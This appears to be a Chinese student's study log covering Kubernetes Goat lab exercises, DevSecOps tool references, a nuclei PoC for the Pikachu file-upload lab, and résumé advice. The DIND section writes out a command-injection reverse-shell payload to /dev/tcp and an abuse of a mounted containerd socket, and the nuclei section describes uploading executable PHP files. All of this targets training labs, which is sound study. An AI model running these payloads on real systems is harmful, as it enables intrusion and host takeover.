1、参考课件复习云相关基础概念
2、使用minikube搭建k8s集群,并学习基础操作
3、搭建k8s-goat靶场,并参考官方文档和课件完成dind等场景的练习
拿到文件,则cd kubernetes-goat进入目录,修改 scenarios/internal-proxy/deployment.yaml 中CPU和内存值为300M,修改下面文件中映射的默认套接字scenarios/health-check/deployment.yaml,修改为/var/run/docker.sock
运行kubernetes-goat的K8S服务
bash
bash setup-kubernetes-goat.sh启动应用服务的端口转发
bash
bash access-kubernetes-goat.sh访问1234端口,就可以看到全部的场景信息,搭建成功
k8s-goat的DIND啊 ,根据提示,访问1231端口
这是一个命令执行的页面,比如下图
我们执行监听ncat -lvvp 6666,接下来submit反弹shell:127.0.0.1;bash -c 'bash -i >& /dev/tcp/192.168.40.128/6666 0>&1',得到下图
执行mount命令,查看文件系统挂载情况
通过 /custom/containerd/containerd.sock 可以对 Docker 进行管理,查看套接字是否可用
下一步下载合适工具控制docker,查看目标系统的架构
根据操作系统架构和docker版本,下载对应的docker客户端
bash
wget https://download.docker.com/linux/static/stable/x86_64/docker-26.1.1.tgz -O /tmp/docker.tar.gz解压缩到临时目录
bash
tar -xvf /tmp/docker.tar.gz -C /tmp/执行 Docker 命令,挂载 sock,进行管理
bash
/tmp/docker/docker -H unix:///custom/containerd/containerd.sock images
4、复习devsecops相关概念和开源工具
SAST工具呢,可以看看Fortify和enkins集成-腾讯云开发社区、jenkins用户手册、Fortify集成-Gitlab
参考基于开源工具实现软件成分分析SCA 和如何集成 Snyk 和 Bitbucket Cloud 以实现 DevSecOps
参考jenkins+Acunetix实现自动化安全测试 - 菜菜聊架构 - 博客园 (cnblogs.com)、Jenkins集成AppScan实现_jenkins scan-build-CSDN博客
参考IAST | 洞态文档 (dongtai.io)、IAST 扫描器 - OpenRASP 官方文档 - 开源自适应安全产品 (baidu.com)
5、复习nuclei工具的使用和poc编写,编写pikachu文件上传lou洞poc
bash
nuclei -h这将显示Nuclei的帮助,以下是所有支持的命令。
nuclei编写pikachu靶场文件上传的poc啊 ,这里我用了ai,编写好后,执行如下图
手动访问以下URL(末尾文件名为实际检测到的文件名):
- Client Check:
http://pp.com/vul/unsafeupload/uploads/client_20260330_1200.php - MIME Type:
http://pp.com/vul/unsafeupload/uploads/server_20260330_1200.php - GetImageSize:
http://pp.com/vul/unsafeupload/uploads/2026/03/30/45257169ca672ef1ed5426189047.jpg
前两种上传的文件,检验可执行性,点击跳转网页显示phpinfo,getimagesize则一片乌黑,那么前两种可执行,getimagesize不可执行
6、认真打磨个人简历
排版参照优秀简历模版,基本的必要属性写清楚明白,求职意向所需要的软硬实力也写明白,其他软硬实力是加分项,也补上有相关性的